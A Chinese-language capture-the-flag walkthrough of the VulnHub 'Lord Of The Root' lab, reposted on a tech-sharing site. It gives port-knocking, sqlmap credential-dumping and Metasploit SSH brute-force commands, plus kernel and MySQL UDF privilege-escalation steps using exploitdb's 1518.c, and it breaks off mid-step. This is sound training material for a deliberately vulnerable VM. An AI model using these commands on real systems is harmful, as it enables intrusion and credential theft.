ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

VulnHub-Lord Of The Root

2020-12-16 20:31:23  阅读:244  来源: 互联网

标签:-- root 端口 192.168 提权 VulnHub Lord Root 120.135


靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/
目标:得到root权限&找到flag.txt

在这里插入图片描述开机就是个这

在这里插入图片描述

目标计算机IP地址:192.168.120.135
在这里插入图片描述只有一个22 端口

尝试 ssh连接

在这里插入图片描述这里有一个知识点:

端口碰撞: 端口上的防火墙通过产生一组预先指定关闭的端口进行连接尝试,
一旦接收到正确的连接尝试序列,防火墙规则就会动态修改,
以允许发送连接尝试的主机通过特定端口进行连接。

使用ping命令冲撞三次试试1,2,3

命令:hping3 -S 192.168.120.135 -p 1 -c 1

在这里插入图片描述

通过ping冲撞之后,防火墙规则会修改,重新扫描一次试试

在这里插入图片描述

扫出了1337端口,访问

在这里插入图片描述

查看下robots.txt文件

F12四处找找

在这里插入图片描述

找到base64值:

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

进行解密

在这里插入图片描述

kali里面也可以 (断网情况用)

在这里插入图片描述

Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

继续进行二次解码
在这里插入图片描述

/978345210/index.php

很明显是个目录

访问试试

在这里插入图片描述

目前不知道确切的用户名和密码,可以使用SQLMAP进行基于登录表单的注入查看,检索数据库名称和登录凭据

命令:sqlmap -o -u "http://192.168.120.135:1337/978345210/index.php" --forms --dbs

在这里插入图片描述

继续获取webapp数据表信息

命令:sqlmap -o -u "http://192.168.120.135:1337/978345210/index.php" --forms -D Webapp --tables

在这里插入图片描述

这里可以看到Users数据表,继续查看数据表信息

命令:sqlmap -o -u "http://192.168.120.135:1337/978345210/index.php" --forms -D Webapp -T Users --columns

在这里插入图片描述

这里看到了一些专栏,进行转储选出最终结果

命令:sqlmap -o -u "http://192.168.120.135:1337/978345210/index.php" --forms -D Webapp -T Users -C id,username,password --dump

在这里插入图片描述

将这些用户名和密码保存在两个不同的文本中,使用msfconsole 来破解SSH正确的账号密码

上msf

用这个模块 来破解SSH正确的账号密码

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

账号:smeagol
密码:MyPreciousR00t

二、提权

第一种-Linux内核提权

SSH登录
在这里插入图片描述
查看靶机版本

lsb_release -a

在这里插入图片描述

查看到ubuntu 14.04 的版本

上msf 找
在这里插入图片描述
用这个 进行提权

复制到本地

在这里插入图片描述
在这里插入图片描述
ok 已经是root权限了

在这里插入图片描述

第二-root身份运行MySQL提权

ssh 登录
在这里插入图片描述
MySQL以root权限运行、

命令:ps aux | grep mysql

在这里插入图片描述
检查数据库版本

命令:mysql --version

在这里插入图片描述
有了以上信息,需要exploit进行反弹shell提权


在这里插入图片描述用这个

cp /usr/share/exploitdb/exploits/linux/local/1518.c /root

将1518.c的shell上传到smeagol用户下

在这里插入图片描述
根据1518.c 进行制作反弹shell

cp 1518.c raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -oraptor_udf2.so raptor_udf2.o -lc

在这里插入图片描述
制作完成 但是这里 需要

数据库 的账号和密码

一般都在www目录下

在这里插入图片描述ok有了

进入数据库

在这里插入图片描述查看是否可以运用mysql的udf提权

具体 可以看这里:https://blog.csdn.net/wo41ge/article/details/111149351

命令:show global variables like 'secure%';

当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出文件,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出文件只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出文件做限制,此时可提权

在这里插入图片描述
所以可以进行mysql的udf提权

查看主机版本及数据库架构

在这里插入图片描述
因数据库为i6886,要使用32位udf文件

查看plugin目录地址

在这里插入图片描述

此处为上传udf文件地址

/usr/lib/mysql/plugin/

去sqlmap 里面找到udf文件

综上情况 要用32位的.so

在这里插入图片描述
将他复制到/root 下
在这里插入图片描述开启端口 进行下载

python -m SimpleHTTPServer 5555

标签:--,root,端口,192.168,提权,VulnHub,Lord,Root,120.135
来源: https://blog.csdn.net/wo41ge/article/details/111184528

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有